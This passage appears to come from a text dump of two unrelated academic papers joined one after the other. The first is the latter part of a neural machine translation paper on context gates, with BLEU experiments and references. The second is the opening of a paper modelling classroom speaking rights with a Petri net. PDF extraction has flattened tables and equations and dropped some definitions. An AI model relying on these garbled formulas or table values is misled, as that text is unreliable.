contexts or both contexts, as illustrated in Fig- ure 4. The first two strategies are inspired by out- put gates in LSTMs (Hochreiter and Schmidhuber, 1997), which control the amount of memory content utilized. In these kinds of models, zi only affects either source context (i.e., si) or target context (i.e., yi−1 and ti−1): • Context Gate (source) ti = f ( We(yi−1) + Uti−1 + zi ◦Csi ) • Context Gate (target) ti = f ( zi ◦ (We(yi−1) + Uti−1) + Csi ) where ◦ is an element-wise multiplication, and zi is the context gate calculated by Equation 4. This is also essentially similar to the reset gate in the GRU, which decides what information to forget from the previous decoding state before transferring that in- formation to the decoding activation layer. The dif- ference is that here the “reset” gate resets the context vector rather than the previous decoding state. The last strategy is inspired by the concept of up- date gate from GRU, which takes a linear sum be- tween the previous state ti−1 and the candidate new state t̃i. In our case, we take a linear interpolation between source and target contexts: • Context Gate (both) ti = f ( (1−zi)◦ (We(yi−1) + Uti−1) + zi ◦Csi ) 91 (a) Gating Scalar (b) Context Gate Figure 5: Comparison to Gating Scalar proposed by Xu et al. (2015). 4 Related Work Comparison to (Xu et al., 2015): Context gates are inspired by the gating scalar model proposed by Xu et al. (2015) for the image caption genera- tion task. The essential difference lies in the task requirement: • In image caption generation, the source side (i.e., image) contains more information than the target side (i.e., caption). Therefore, they em- ploy a gating scalar to scale only the source context. • In machine translation, both languages should contain equivalent information. Our model jointly controls the contributions from the source and target contexts. A direct interaction between input signals from both sides is useful for balancing adequacy and fluency of NMT. Other differences in the architecture include: 1 Xu et al. (2015) uses a scalar that is shared by all elements in the source context, while we employ a gate with a distinct weight for each el- ement. The latter offers the gate a more precise control of the context vector, since different el- ements retain different information. 2 We add peephole connections to the architec- ture, by which the source context controls the gate. It has been shown that peephole connec- tions make precise timings easier to learn (Gers and Schmidhuber, 2000). 3 Our context gate also considers the previously generated word yi−1 as input. The most re- cently generated word can help the gate to bet- ter estimate the importance of target context, especially for the generation of function words in translations that may not have a correspond- ing word in the source sentence (e.g., “of” after “is fond”). Experimental results (Section 5.4) show that these modifications consistently improve translation qual- ity. Comparison to Gated RNN: State-of-the-art NMT models (Sutskever et al., 2014; Bahdanau et al., 2015) generally employ a gated unit (e.g., GRU or LSTM) as the activation function in the decoder. One might suspect that the context gate proposed in this work is somewhat redundant, given the existing gates that control the amount of information carried over from the previous decoding state si−1 (e.g., re- set gate in GRU). We argue that they are in fact com- plementary: the context gate regulates the contextual information flowing into the decoding state, while the gated unit captures long-term dependencies be- tween decoding states. Our experiments confirm the correctness of our hypothesis: the context gate not only improves translation quality when compared to a conventional RNN unit (e.g., an element-wise tanh), but also when compared to a gated unit of GRU, as shown in Section 5.2. Comparison to Coverage Mechanism: Re- cently, Tu et al. (2016) propose adding a coverage mechanism into NMT to alleviate over-translation and under-translation problems, which directly affect translation adequacy. They maintain a cov- erage vector to keep track of which source words have been translated. The coverage vector is fed to the attention model to help adjust future attention. This guides NMT to focus on the un-translated source words while avoiding repetition of source content. Our approach is complementary: the cov- erage mechanism produces a better source context representation, while our context gate controls the effect of the source context based on its relative importance. Experiments in Section 5.2 show that combining the two methods can further improve translation performance. There is another difference 92 as well: the coverage mechanism is only applicable to attention-based NMT models, while the context gate is applicable to all NMT models. Comparison to Exploiting Auxiliary Contexts in Language Modeling: A thread of work in lan- guage modeling (LM) attempts to exploit auxiliary sentence-level or document-level context in an RNN LM (Mikolov and Zweig, 2012; Ji et al., 2015; Wang and Cho, 2016). Independent of our work, Wang and Cho (2016) propose “early fusion” models of RNNs where additional information from an inter- sentence context is “fused” with the input to the RNN. Closely related to Wang and Cho (2016), our approach aims to dynamically control the contribu- tions of required source and target contexts for ma- chine translation, while theirs focuses on integrating auxiliary corpus-level contexts for language mod- elling to better approximate the corpus-level prob- ability. In addition, we employ a gating mechanism to produce a dynamic weight at different decoding steps to combine source and target contexts, while they do a linear combination of intra-sentence and inter-sentence contexts with static weights. Exper- iments in Section 5.2 show that our gating mech- anism significantly outperforms linear interpolation when combining contexts. Comparison to Handling Null-Generated Words in SMT: In machine translation, there are certain syntactic elements of the target language that are missing in the source (i.e., null-generated words). In fact this was the preliminary motivation for our approach: current attention models lack a mecha- nism to control the generation of words that do not have a strong correspondence on the source side. The model structure of NMT is quite similar to the traditional word-based SMT (Brown et al., 1993). Therefore, techniques that have proven effective in SMT may also be applicable to NMT. Toutanova et al. (2002) extend the calculation of translation prob- abilities to include null-generated target words in word-based SMT. These words are generated based on both the special source token null and the neigh- bouring word in the target language by a mixture model. We have simplified and generalized their ap- proach: we use context gates to dynamically control the contribution of source context. When produc- ing null-generated words, the context gate can as- sign lower weights to the source context, by which the source-side information have less influence. In a sense, the context gate relieves the need for a null state in attention. 5 Experiments 5.1 Setup We carried out experiments on Chinese-English translation. The training dataset consisted of 1.25M sentence pairs extracted from LDC corpora5, with 27.9M Chinese words and 34.5M English words re- spectively. We chose the NIST 2002 (MT02) dataset as the development set, and the NIST 2005 (MT05), 2006 (MT06) and 2008 (MT08) datasets as the test sets. We used the case-insensitive 4-gram NIST BLEU score (Papineni et al., 2002) as the evalua- tion metric, and sign-test (Collins et al., 2005) for the statistical significance test. For efficient training of the neural networks, we limited the source and target vocabularies to the most frequent 30K words in Chinese and English, covering approximately 97.7% and 99.3% of the data in the two languages respectively. All out-of- vocabulary words were mapped to a special token UNK. We trained each model on sentences of length up to 80 words in the training data. The word em- bedding dimension was 620 and the size of a hid- den layer was 1000. We trained our models until the BLEU score on the development set stops improv- ing. We compared our method with representative SMT and NMT6 models: • Moses (Koehn et al., 2007): an open source phrase-based translation system with default configuration and a 4-gram language model trained on the target portion of training data; • GroundHog (Bahdanau et al., 2015): an open source attention-based NMT model with de- fault setting. We have two variants that differ in the activation function used in the decoder 5The corpora include LDC2002E18, LDC2003E07, LDC2003E14, Hansards portion of LDC2004T07, LDC2004T08 and LDC2005T06. 6There is some recent progress on aggregating multiple models or enlarging the vocabulary(e.g.,, in (Jean et al., 2015)), but here we focus on the generic models. 93 # System #Parameters MT05 MT06 MT08 Ave. 1 Moses – 31.37 30.85 23.01 28.41 2 GroundHog (vanilla) 77.1M 26.07 27.34 20.38 24.60 3 2 + Context Gate (both) 80.7M 30.86∗ 30.85∗ 24.71∗ 28.81 4 GroundHog (GRU) 84.3M 30.61 31.12 23.23 28.32 5 4 + Context Gate (source) 87.9M 31.96∗ 32.29∗ 24.97∗ 29.74 6 4 + Context Gate (target) 87.9M 32.38∗ 32.11∗ 23.78 29.42 7 4 + Context Gate (both) 87.9M 33.52∗ 33.46∗ 24.85∗ 30.61 8 GroundHog-Coverage (GRU) 84.4M 32.73 32.47 25.23 30.14 9 8 + Context Gate (both) 88.0M 34.13∗ 34.83∗ 26.22∗ 31.73 Table 2: Evaluation of translation quality measured by case-insensitive BLEU score. “GroundHog (vanilla)” and “GroundHog (GRU)” denote attention-based NMT (Bahdanau et al.,2015) and uses a sim- ple tanh function or a sophisticated gate function GRU respectively as the activation function in the de- coder RNN. “GroundHog-Coverage” denotes attention-based NMT with a coverage mechanism to indicate whether a source word is translated or not (Tu et al., 2016). “*” indicate statistically significant difference (p < 0.01) from the corresponding NMT variant. “2 + Context Gate (both)” denotes integrating “Context Gate (both)” into the baseline system in Row 2 (i.e., “GroundHog (vanilla)”). RNN: 1) GroundHog (vanilla) uses a simple tanh function as the activation function, and 2) GroundHog (GRU) uses a sophisticated gate function GRU; • GroundHog-Coverage (Tu et al., 2016)7: an improved attention-based NMT model with a coverage mechanism. 5.2 Translation Quality Table 2 shows the translation performances in terms of BLEU scores. We carried out experiments on multiple NMT variants. For example, “2 + Context Gate (both)” in Row 3 denotes integrating “Con- text Gate (both)” into the baseline in Row 2 (i.e., GroundHog (vanilla)). For baselines, we found that the gated unit (i.e., GRU, Row 4) indeed surpasses its vanilla counterpart (i.e., tanh, Row 2), which is consistent with the results in other work (Chung et al., 2014). Clearly the proposed context gates significantly improve the translation quality in all cases, although there are still considerable differ- ences among the variants: Parameters Context gates introduce a few new parameters. The newly introduced parameters in- clude Wz ∈ Rn×m, Uz ∈ Rn×n, Cz ∈ Rn×n ′ in 7https://github.com/tuzhaopeng/ NMT-Coverage. Equation 4. In this work, the dimensionality of the decoding state is n = 1000, the dimensionality of the word embedding is m = 620, and the dimen- sionality of context representation is n′ = 2000. The context gates only introduce 3.6M additional param- eters, which is quite small compared to the number of parameters in the existing models (e.g., 84.3M in the “GroundHog (GRU)”). Over GroundHog (vanilla) We first carried out experiments on a simple decoder without gating function (Rows 2 and 3), to better estimate the im- pact of context gates. As shown in Table 2, the proposed context gate significantly improved trans- lation performance by 4.2 BLEU points on average. It is worth emphasizing that context gate even out- performs a more sophisticated gating function (i.e., GRU in Row 4). This is very encouraging, since our model only has a single gate with half of the param- eters (i.e., 3.6M versus 7.2M) and less computations (i.e., half the matrix computations to update the de- coding state8). 8We only need to calculate the context gate once via Equa- tion 4 and then apply it when updating the decoding state. In contrast, GRU requires the calculation of an update gate, a re- set gate, a proposed updated decoding state and an interpolation between the previous state and the proposed state. Please refer to (Cho et al., 2014) for more details. 94 GroundHog vs. GroundHog+Context Gate Adequacy Fluency < = > < = > evaluator1 30.0% 54.0% 16.0% 28.5% 48.5% 23.0% evaluator2 30.0% 50.0% 20.0% 29.5% 54.5% 16.0% Table 3: Subjective evaluation of translation adequacy and fluency. Over GroundHog (GRU) We then investigated the effect of the context gates on a standard NMT with GRU as the decoding activation function (Rows 4-7). Several observations can be made. First, con- text gates also boost performance beyond the GRU in all cases, demonstrating our claim that context gates are complementary to the reset and update gates in GRU. Second, jointly controlling the infor- mation from both translation contexts consistently outperforms its single-side counterparts, indicating that a direct interaction between input signals from the source and target contexts is useful for NMT models. Over GroundHog-Coverage (GRU) We finally tested on a stronger baseline, which employs a cov- erage mechanism to indicate whether or not a source word has already been translated (Tu et al., 2016). Our context gate still achieves a significant improve- ment of 1.6 BLEU points on average, reconfirm- ing our claim that the context gate is complemen- tary to the improved attention model that produces a better source context representation. Finally, our best model (Row 7) outperforms the SMT baseline system using the same data (Row 1) by 3.3 BLEU points. From here on, we refer to “GroundHog” for “GroundHog (GRU)”, and “Context Gate” for “Context Gate (both)” if not otherwise stated. Subjective Evaluation We also conducted a sub- jective evaluation of the benefit of incorporating context gates. Two human evaluators were asked to compare the translations of 200 source sentences randomly sampled from the test sets without know- ing which system produced each translation. Table 3 shows the results of subjective evaluation. The two human evaluators made similar judgments: in ade- quacy, around 30% of GroundHog translations are worse, 52% are equal, and 18% are better; while in System SAER AER GroundHog 67.00 54.67 + Context Gate 67.43 55.52 GroundHog-Coverage 64.25 50.50 + Context Gate 63.80 49.40 Table 4: Evaluation of alignment quality. The lower the score, the better the alignment quality. fluency, around 29% are worse, 52% are equal, and 19% are better. 5.3 Alignment Quality Table 4 lists the alignment performances. Follow- ing Tu et al. (2016), we used the alignment error rate (AER) (Och and Ney, 2003) and its variant SAER to measure the alignment quality: SAER = 1− |MA ×MS|+ |MA ×MP ||MA|+ |MS| where A is a candidate alignment, and S and P are the sets of sure and possible links in the refer- ence alignment respectively (S ⊆ P ). M denotes the alignment matrix, and for both MS and MP we assign the elements that correspond to the existing links in S and P probability 1 and the other elements probability 0. In this way, we are able to better eval- uate the quality of the soft alignments produced by attention-based NMT. We find that context gates do not improve align- ment quality when used alone. When combined with coverage mechanism, however, it produces bet- ter alignments, especially one-to-one alignments by selecting the source word with the highest align- ment probability per target word (i.e., AER score). One possible reason is that better estimated decod- ing states (from the context gate) and coverage in- formation help to produce more concentrated align- ments, as shown in Figure 6. 95 (a) GroundHog-Coverage (SAER=50.80) (b) + Context Gate (SAER=47.35) Figure 6: Example alignments. Incorporating context gate produces more concentrated alignments. # System Gate Inputs MT05 MT06 MT08 Ave. 1 GroundHog – 30.61 31.12 23.23 28.32 2 1 + Gating Scalar ti−1 31.62∗ 31.48 23.85 28.98 3 1 + Context Gate (source) ti−1 31.69∗ 31.63 24.25∗ 29.19 4 1 + Context Gate (both) ti−1 32.15∗ 32.05∗ 24.39∗ 29.53 5 ti−1, si 31.81∗ 32.75∗ 25.66∗ 30.07 6 ti−1, si, yi−1 33.52∗ 33.46∗ 24.85∗ 30.61 Table 5: Analysis of the model architectures measured in BLEU scores. “Gating Scalar” denotes the model proposed by (Xu et al.,2015) in the image caption generation task, which looks at only the previous decod- ing state ti−1 and scales the whole source context si at the vector-level. To investigate the effect of each component, we list the results of context gate variants with different inputs (e.g., the previously generated word yi−1). “*” indicates statistically significant difference (p < 0.01) from “GroundHog”. 5.4 Architecture Analysis Table 5 shows a detailed analysis of architecture components measured in BLEU scores. Several ob- servations can be made: • Operation Granularity (Rows 2 and 3): Element-wise multiplication (i.e., Context Gate (source)) outperforms the vector-level scalar (i.e., Gating Scalar), indicating that precise control of each element in the context vector boosts translation performance. • Gate Strategy (Rows 3 and 4): When only fed with the previous decoding state ti−1, Context Gate (both) consistently outperforms Context Gate (source), showing that jointly controlling information from both source and target sides is important for judging the importance of the contexts. • Peephole connections (Rows 4 and 5): Peep- holes, by which the source context si controls the gate, play an important role in the context gate, which improves the performance by 0.57 in BLEU score. • Previously generated word (Rows 5 and 6): Previously generated word yi−1 provides a more explicit signal for the gate to judge the importance of contexts, leading to a further im- provement on translation performance. 5.5 Effects on Long Sentences We follow Bahdanau et al. (2015) and group sen- tences of similar lengths together. Figure 7 shows 96 Figure 7: Performance of translations on the test set with respect to the lengths of the source sentences. Context gate improves performance by alleviating in-adequate translations on long sentences. the BLEU score and the averaged length of trans- lations for each group. GroundHog performs very well on short source sentences, but degrades on long source sentences (i.e., > 30), which may be due to the fact that source context is not fully interpreted. Context gates can alleviate this problem by balanc- ing the source and target contexts, and thus improve decoder performance on long sentences. In fact, in- corporating context gates boost translation perfor- mance on all source sentence groups. We confirm that context gate weight zi correlates well with translation performance. In other words, translations that contain higher zi (i.e., source con- text contributes more than target context) at many time steps are better in translation performance. We used the mean of the sequence z1, . . . ,zi, . . . ,zI as the gate weight of each sentence. We calculated the Pearson Correlation between the sentence-level gate weight and the corresponding improvement on translation performance (i.e., BLEU, adequacy, and fluency scores),9 as shown in Table 6. We observed that context gate weight is positively correlated with translation performance improvement and that the correlation is higher on long sentences. As an example, consider this source sentence from the test set: 9We use the average of correlations on subjective evaluation metrics (i.e., adequacy and fluency) by two evaluators. Length BLEU Adequacy Fluency < 30 0.024 0.071 0.040 > 30 0.076 0.121 0.168 Table 6: Correlation between context gate weight and improvement of translation performance. “Length” denotes the length of source sentence. “BLEU”, “Adequacy”, and “Fluency” denotes different metrics measuring the translation perfor- mance improvement of using context gates. zhōuliù zhèngshı̀ yı̄ngguó mı́nzhòng dào chāoshı̀ cǎigòu de gāofēng shı́kè, dāngshı́ 14 jiā chāoshı̀ de guānbı̀ lı̀ng yı̄ngguó zhè jiā zuı̀ dà de liánsuǒ chāoshı̀ sǔnshı̄ shùbǎiwàn yı̄ngbàng de xiāoshòu shōurù . GroundHog translates it into: twenty - six london supermarkets were closed at a peak hour of the british pop- ulation in the same period of time . which almost misses all the information of the source sentence. Integrating context gates improves the translation adequacy: this is exactly the peak days British peo- ple buying the supermarket . the closure 97 of the 14 supermarkets of the 14 super- markets that the largest chain supermar- ket in england lost several million pounds of sales income . Coverage mechanisms further improve the transla- tion by rectifying over-translation (e.g., “of the 14 supermarkets”) and under-translation (e.g., “satur- day” and “at that time”): saturday is the peak season of british peo- ple ’s purchases of the supermarket . at that time , the closure of 14 supermarkets made the biggest supermarket of britain lose millions of pounds of sales income . 6 Conclusion We find that source and target contexts in NMT are highly correlated to translation adequacy and flu- ency, respectively. Based on this observation, we propose using context gates in NMT to dynamically control the contributions from the source and target contexts in the generation of a target sentence, to enhance the adequacy of NMT. By providing NMT the ability to choose the appropriate amount of in- formation from the source and target contexts, one can alleviate many translation problems from which NMT suffers. Experimental results show that NMT with context gates achieves consistent and signifi- cant improvements in translation quality over differ- ent NMT models. Context gates are in principle applicable to all sequence-to-sequence learning tasks in which infor- mation from the source sequence is transformed to the target sequence (corresponding to adequacy) and the target sequence is generated (corresponding to fluency). In the future, we will investigate the ef- fectiveness of context gates to other tasks, such as dialogue and summarization. It is also necessary to validate the effectiveness of our approach on more language pairs and other NMT architectures (e.g., using LSTM as well as GRU, or multiple layers). Acknowledgement This work is supported by China National 973 project 2014CB340301. Yang Liu is supported by the National Natural Science Foundation of China (No. 61522204) and the 863 Program (2015AA015407). We thank action editor Chris Quirk and three anonymous reviewers for their in- sightful comments. References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. ICLR 2015. Peter E. Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and Robert L. Mercer. 1993. The mathematics of statistical machine translation: Parameter estima- tion. Computational Linguistics, 19(2):263–311. Kyunghyun Cho, Bart van Merrienboer, Caglar Gulcehre, Fethi Bougares, Holger Schwenk, and Yoshua Ben- gio. 2014. Learning phrase representations using rnn encoder-decoder for statistical machine translation. In EMNLP 2014. Junyoung Chung, Caglar Gulcehre, KyungHyun Cho, and Yoshua Bengio. 2014. Empirical evaluation of gated recurrent neural networks on sequence model- ing. arXiv. Michael Collins, Philipp Koehn, and Ivona Kučerová. 2005. Clause restructuring for statistical machine translation. In ACL 2005. Felix A Gers and Jürgen Schmidhuber. 2000. Recurrent nets that time and count. In IJCNN 2000. IEEE. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation. Sébastien Jean, Kyunghyun Cho, Roland Memisevic, and Yoshua Bengio. 2015. On using very large target vo- cabulary for neural machine translation. In ACL 2015. Yangfeng Ji, Trevor Cohn, Lingpeng Kong, Chris Dyer, and Jacob Eisenstein. 2015. Document context lan- guage models. In ICLR 2015. Nal Kalchbrenner and Phil Blunsom. 2013. Recurrent continuous translation models. In EMNLP 2013. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, Nicola Bertoldi, Brooke Cowan, Wade Shen, Christine Moran, Richard Zens, Chris Dyer, Ondrej Bojar, Alexandra Con- stantin, and Evan Herbst. 2007. Moses: open source toolkit for statistical machine translation. In ACL 2007. Minh-Thang Luong, Hieu Pham, and Christopher D. Manning. 2015. Effective approaches to attention- based neural machine translation. In EMNLP 2015. Tomas Mikolov and Geoffrey Zweig. 2012. Context de- pendent recurrent neural network language model. In SLT 2012. Franz J. Och and Hermann Ney. 2003. A systematic comparison of various statistical alignment models. Computational Linguistics, 29(1):19–51. 98 Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. BLEU: a method for automatic eval- uation of machine translation. In ACL 2002. Matthew Snover, Nitin Madnani, Bonnie J Dorr, and Richard Schwartz. 2009. Fluency, adequacy, or HTER?: exploring different human judgments with a tunable MT metric. In Proceedings of the Fourth Workshop on Statistical Machine Translation, pages 259–268. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. In NIPS 2014. Kristina Toutanova, H. Tolga Ilhan, and Christopher D. Manning. 2002. Extensions to HMM-based statistical word alignment models. In EMNLP 2012. Zhaopeng Tu, Zhengdong Lu, Yang Liu, Xiaohua Liu, and Hang Li. 2016. Modeling coverage for neural machine translation. In ACL 2016. Tian Wang and Kyunghyun Cho. 2016. Larger-context language modelling with recurrent neural network. In ACL 2016. Kelvin Xu, Jimmy Ba, Ryan Kiros, Kyunghyun Cho, Aaron Courville, Ruslan Salakhutdinov, Richard Zemel, and Yoshua Bengio. 2015. Show, attend and tell: Neural image caption generation with visual at- tention. In ICML 2015. 99 100 work_yhebvymmmrhipnq36s66tjy2u4 ---- 29 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Research of Virtual Network Classroom Collaborative Mechanism Based on Petri Net Shengquan Yang1, Shujuan Huang2 School of Computer Science and Engineering Xi’an Technological University, Xi’an, 710032 China Email: 1xaitysq@163.com; 2Shujuanhuang@163.com Abstract. In order to keep multi-role communication action of virtual network classroom orderly and correctly at the same time, this paper proposes and studies its communication collaborative relationship based on Petri Net. Firstly, it introduces the basic theory and the system state change graph of the roles in virtual classroom, and discusses in detail the collaborative relationship between students and teacher in network environment. Especially by taking advantage of Petri Net tool, this paper in virtue of formalized method describes and analyzes collaborative relationship and collaborative mechanism between teacher and students, which exists in the virtual classroom. Finally, the collaborative mechanism has been realized successfully with the theory about process control concurrence view. Keywords: Virtual Classroom, Collaborative Mechanism, Petri Net, Process Control 1. Introduction The remote distance learning is a new generation educational pattern which is produced by the combination between computer network and the multimedia technologies today. It uses modern network and information technology to overcome geographic limitations of space, so that teachers, students can complete learning activities in different places. The modern distance learning is one kind of new education form which produces along with the present development of information technology, which is a principal means to construct people lifelong to study mode during the era of knowledge economy. In distance learning interactive system, although teachers and students living in different places, but it feels like in a classroom, in which the teachers and students can see each other and be able to hear mutually. But because all activities are carry on under the network environment, the teacher is the teaching activity main body, he must have lots of qualifications such as that he can control the student to join, to make the student withdraw, to ask questions to students, and can cause the student to obtain the right to speak, and can cancel the student to speak jurisdictions and so on. The students may ask questions to the teacher at any time. That is, in the entire teaching activities, each kind of activity which will occur will be concurrent, indefinite, and stochastic, therefore a collaborative mechanism must be studied successfully in order to suit the above characteristic, what’s more to maintain the orderliness of the whole teaching and learning activities. 30 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 2. The Cooperative Relationship of Virtual Classroom Virtual classroom is the local area network (LAN) or wide area network (WAN) space to create a virtual reality, interactive teaching and learning environment in order to achieve a variety of traditional classroom teaching function, which can provide a shared collaborative Classroom learning environment for a geographically dispersed network of online teachers and students to so that it can be a variety of real-time communication and collaboration [1]. In the virtual classroom, teacher and the students are acting with the traditional teaching in the same role, but in realizes specifically has the essential difference. This kind of difference mainly displays in the virtual classroom teaching process, because in the long- distance teaching the teacher and the student usually are in the different place, the overwhelming majority students in the network region also possibly are scattered, which causes each kind of concurrent activity becomes very complex. In order to accurately describe the synergy between teaching and learning activities, specific states which exist in teacher and students must be narrated clearly and concretely. (b) Student in seven states Figure.1 The states graph of teacher and student in virtual network classroom In teaching activities, there are two kinds of the teacher’s states (see Figure 1-a): speak (teaching lectures) and listen to students speak, however student’s states (see Figure 1-b) are: listen, speak, pause to speak, continue to speak, be cancelled speeches, be cancelled attendance, allow to speak and listen, a total of seven states. According to the changed states of teacher and student in figure 1, their collaborative relationships are described below ： In the entire teaching process, there is only a speaker allowed, which either is the teacher, either is the student; At any time each role is played in between speaking and listening state, and what’s more their roles are transformed uncertainly in the two states. When the teacher is at the speech condition, the student listens, When the teacher asks questions or one student applies for speech and obtains the right Research of Virtual Network Classroom Collaborative Mechanism Based on Petri Net 31 to speak, this student starts to speak, but the teacher listens at the time; In order to control the entire ordering process of teaching students, the state change of students must be under the control of teachers, while teacher have rights to cancel the students to speak, to enable students to continue, abolish the “unpopular or unwelcome” students to speak, allowing students to listen and so on. In the network environment, all kinds of states in teaching will be a variety of unpredictable changes in concurrent operation, of which the appearance have many properties such as randomness, uncertainty and instability, etc. For example, students may ask questions at any time, a number of students to apply to speak, where there must be change between listen and speak, teachers and students how to coordinate and so on, it is necessary to control a variety of concurrent activities of a cooperative mechanism. 3. Petri Net Model of Cooperative Relations Coordination mechanism among the virtual classroom is a typical computer supported collaborative work of the problem, which is abbreviated as CSCW. The so-called computer supported collaborative work that is more than one member of a group existed in some distributed network systems use multiple computers to work together to accomplish a task. Because of this thinking is reflected in the information age groups, the way people work, interactive, distributed and collaborative nature of the objective requirements, it gives full play to the computer network as a potential communications media and superiority, which is being increasingly widely appreciated. That, computer supported cooperative work applied to the teaching field, is known as computer supported collaborative learning, abbreviated as CSCL. Petri net is a useful tool of graphical representation, which has a combination of available models, and it has much unique strengths when needing to find on the description and analysis of the phenomenon. Petri net is also well and strict defined mathematical object; furthermore it may be appropriate not only to static structural analysis, but also to dynamic behavior analysis by way of the mathematical development of the Petri net analysis methods and techniques[3] [4]. 3.1 Establish the Petri net model Definition 1: a triple-type N = (S, T; F) can be called a net, if and only if (1) (2) (3)dom(F) ∪ cod(F)= S ∪ T and x˙={ y | ( y ∈ S ∪ T ) ∧ ((x, y) ∈ F )} are called the pre-set and rear-set. Definition 2: Quadruple PN = (P, T, F, M) can be called Petri net, if and only if 1) N = (P, T; F) is a net. 2) M: S → Z (set of non-negative integers) for the identity function, where M0 is the initial marking 32 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 (that is initial state) 3) Firing rules: when transition (migration change) t ∈ T can be called enabled under state M, if and only if s ∈ ˙t : M(p) ≥ 1; From M the transition that t is enabled can lead to state changes, which is obtained subsequent identification M’ after triggering. Petri net is consists of four different elements, as follows: Place (P), with “O” expression, Transition (T), with “—” expression, the arc of direction that connect Place and Transition, and the token in the Place (Token, with a “●” expression). Place is used to describe the logic state of the system, and transition is used for the action and production process of all events. The input function (I) and the output function (O) expresses are used for contiguous function relations separately between the place and the transition, If a Place is given a mark k (k is a non-negative integer), then the Place has k tokens, also known as the Place has been marked, Thus a marked Petri net in the definition 2 can be decomposed into a quintuple PN = (P, T, I, O, M), M is the Petri net state identification sets. The collaborative mechanism among the virtual network classroom can be described into a Petri net, as shown in Figure 2: Figure.2 Petri net model of the collaborative mechanism among the virtual network classroom The concrete description meaning see Table 1, including: Place P={ P1，P2，P3，P4，P5，P6}， Transition T={ T1，T2，T3，T4，T5 }， Token ω=N+1 in P1 indicates N student and 1 teacher, Token ● in P5 indicates that one speak right resource is available. Research of Virtual Network Classroom Collaborative Mechanism Based on Petri Net 33 Table 1 Petri net model concrete description meaning 3.2 Analyze the Petri net model of the collaborative mechanism The description of figure 2 is happen to the initial state of the system, which represents the teacher and student’s token are in the P1 place. Teacher work flow showing is as follows: 1) When teacher is teaching, the teacher needs to apply for the speak right to the system, then the T1 transition will work so that teacher token flows from the P1 place to the P2 place, which indicates that the teacher wants to get the speak right from the system, and by now if a student X is in the P3 place, then will enter (2), otherwise will change over to (3). 2) The teacher has the highest priority of the system, this now if a student X is in the P3 place, which namely indicates that the student X is speaking, then the system sends out an event of letting this student X release speak right unconditionally, so that the T3 transition occurs, the student X flows from the P3 place to the P1 place, simultaneously the right to speak resources flow from the P6 place to the P5 place, which namely indicates that the right to speak will change from busy state to idle condition. 3) Because the right to speak resources are at the idling condition, the system allows the teacher to obtain the speech firstly, then the T2 transition occurs, teacher token flows from the P2 place to P3 the place, which indicates that the teacher is at teaching or the commentary condition; Simultaneously the right to speak resources flow from the P5 place to the P6 place, which indicates that the right resources to speak is not available. 4) The teacher speaks a subject or a section of curricula, then puts forward a question or permits some student inquiry, or lets the student in waiting queue who was spoke ago, the teacher sends out the release speak right event, the T3 transition occurs, the teacher flows from the P3 place to the P1 place, simultaneously the speak right resources flows from the P6 place to the P5 place, which namely indicates that the right to speak will change from busy state to idle condition. The system enters the next round of speak right resources competition recurrent state. Student work flow showing is as follows: Place State or behavior P1 the teacher or the student are at listen state P2 Execute the task of applying for speak right resources P3 With obtained the speak right, can execute speak task P4 Expressed that the student is at forbids to listen the teaching P5 Indicated that the speak right resources is at the idling state P6 Indicated that the speak right resources is at the using state Transition command or event T1 Send command to apply for speak T2 Send command to apply for speak T3 Send command to release the speak right resources T4 Send command to cancel the students listening T5 Send command to allow the students listening 34 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 1) When some student ask questions to teachers, the student must apply for the speak right to the system, T1 transition occurs, the student token X flow from P1 place to P2 place, which indicates that the student X is at applying for the right to speak condition. 2) At this time, if the teacher is lecturing or other student in his speech, this student X will be at the waiting status in the P2 place, until the right to speak is changed from the busy to idle (Idle) state, then transfers to (3) to execute. 3) Because the right to speak resources is at the release condition, according to the priority of students waiting to speak, the system adopts a first-input-first-out (FIFO) principle to serve for them, when student X ‘s priority is highest, T2 transition occurs, students X Token flows from the P2 place to the P3 place, indicating that X is at the speech or inquires some question to teacher; Simultaneously the right to speak resources flows from the P5 place to the P6 place, which indicates that the right to speak resources is occupied. 4) If this student X inquires to teacher, it needs teacher the gap-like to answer the question, then after the student X speaks, the system sends out the suspension speech event, the T3 transition occurs, the student X flows from the P3 place to the P2 place, and the system inserts the student to the first position of the waiting queue that applies for the speak right resources, which indicates that it has the highest priority in the queue of the waiting speech students, Simultaneously the right to speak resources flows from the P6 place to the P5 place, which namely indicates that the right to speak changes form by busy into the idle condition. By now it needs the teacher back and forth to answer questions for the topic, because teacher’s priority is highest, he does not use lining up, once the teacher requests to speak, the system enters teacher’s work flow immediately. 5) In the midway, if teacher wants to cancel the current student X speech, then the teacher sends out cancels the current student to speak the event, which forces this student X unconditional release right to speak, the T3 transition occurs, so that the student X must flow from the P3 place to the P1 place, and the student transforms to listening state, simultaneously the right to speak resources flow from the P6 place to the P5 place, which namely indicates that the right to speak changes from busy into idle condition. The system enters the next round of speak right resources competition recurrent state. 6) During the students listening process, when there is “not welcome” student existence discovered by the teacher, the teacher will send out cancel listening event for the “undesirable” student, the T4 transition occurs, the student X flows from the P1 place to the P4 place, the student transforms into the condition of forbidding to listen. 7) When the student X sends out to the teacher an information that he is willing to observe the classroom discipline, and the teacher permits it’s again adding to listening, the teacher may sends out the event that joins the student X into listening, the T5 transition occurs, the student X from the P4 place flows to the P1 place, the student X transforms into the condition of permission listening. 3.3 model analysis of concurrent and conflict According to the Petri net model knowledge which is described for collaborative mechanism of the virtual classroom, the student and the teacher are just like many advancements stochastically in the system interior, the concurrent movement [2]. But when there are a lot of students common in the application for speak right state, for example, to Research of Virtual Network Classroom Collaborative Mechanism Based on Petri Net 35 identify the M0 = (m, u, 0,0,1,0), and T2 transition is enabled, the students, of which number is v, in the P2 place can flow into the P2 place, because: M0 [T2] M1 = (m,u-v,v,0,1-v,0) And, Mi[T]Mj expresses that the transition T stimulation (also calls ignition), causes the Petri net by to mark Mi to enter marks Mj. But there is only one resources in the P5 place, it must guarantee that 1-v >=0 is correct 